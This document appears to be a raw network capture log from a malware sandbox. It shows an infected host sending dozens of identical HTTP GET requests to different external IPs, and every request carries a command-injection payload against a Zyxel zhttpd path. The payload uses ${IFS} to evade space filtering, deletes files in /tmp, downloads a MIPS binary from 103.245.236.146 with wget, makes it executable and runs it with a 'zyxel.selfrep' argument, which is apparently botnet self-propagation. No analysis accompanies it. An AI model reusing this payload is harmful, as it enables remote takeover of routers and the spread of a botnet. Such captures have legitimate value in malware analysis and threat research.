                                                Jan 29, 2024 07:07:28.989015102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                523192.168.2.2347942189.63.65.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989046097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                524192.168.2.235870214.79.119.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989098072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                525192.168.2.2345868117.23.17.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989125967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                526192.168.2.2354894175.125.4.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989192963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                527192.168.2.2344554119.133.84.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989221096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                528192.168.2.2346470190.125.0.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989283085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                529192.168.2.2335698137.35.115.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989300966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                530192.168.2.2357316101.201.89.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989365101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                531192.168.2.236005280.47.57.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989393950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                532192.168.2.2339954167.39.145.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989438057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                533192.168.2.2344856212.50.109.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989473104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                534192.168.2.235418639.138.91.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989495039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                535192.168.2.234587480.83.173.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989553928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                536192.168.2.233689048.159.92.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989581108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                537192.168.2.2350970150.244.83.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989635944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                538192.168.2.233715667.49.224.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989661932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                539192.168.2.2352428159.51.251.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989708900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                540192.168.2.234990051.194.151.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989739895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                541192.168.2.233848894.250.214.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989782095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                542192.168.2.2356706149.123.60.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989830017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                543192.168.2.2337306130.181.51.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989891052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                544192.168.2.2359108104.213.82.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989912033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                545192.168.2.2353844111.141.223.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989944935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                546192.168.2.234249253.121.196.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.989984035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                547192.168.2.2348568160.223.130.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990021944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                548192.168.2.234471249.239.215.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990042925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                549192.168.2.233714287.179.125.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990087032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                550192.168.2.234635470.71.26.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990128994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                551192.168.2.2334984216.109.220.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990158081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                552192.168.2.2336704186.154.24.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990206957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                553192.168.2.2342760176.34.223.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990238905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                554192.168.2.2341130167.244.89.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990274906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                555192.168.2.234477888.43.154.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990298986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                556192.168.2.233399431.129.215.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990331888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                557192.168.2.2350540119.205.240.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990391970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                558192.168.2.2338394153.73.171.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990413904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                559192.168.2.2335896157.169.226.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990494013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                560192.168.2.2358908115.161.1.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990505934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                561192.168.2.234854870.3.253.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990524054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                562192.168.2.23328725.97.55.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990560055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                563192.168.2.2333200111.250.65.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990617990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                564192.168.2.2335392220.90.248.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990654945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                565192.168.2.2359256107.128.201.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990679979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                566192.168.2.2338552114.241.195.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990725994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                567192.168.2.2360492209.36.37.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990781069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                568192.168.2.2333598193.48.1.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990809917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                569192.168.2.23350548.70.201.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990843058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                570192.168.2.2347474148.139.2.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990886927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                571192.168.2.2359432133.177.204.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990925074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                572192.168.2.2339390220.99.191.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990967035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                573192.168.2.233773679.200.245.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.990991116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                574192.168.2.2339542206.44.145.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991036892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                575192.168.2.2333442109.71.28.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991060019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                576192.168.2.2349882139.55.130.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991113901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                577192.168.2.2333432166.75.66.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991147995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                578192.168.2.233586048.128.47.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991190910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                579192.168.2.234964092.173.17.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991228104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                580192.168.2.235145666.96.249.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991302967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                581192.168.2.233629669.135.209.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991302967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                582192.168.2.2355266114.32.158.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991333961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                583192.168.2.2345180112.81.107.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991384029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                584192.168.2.2357146137.143.140.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991405964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                585192.168.2.2349594138.206.231.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.991457939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                586192.168.2.233596463.180.237.74443
                                                TimestampBytes transferredDirectionData
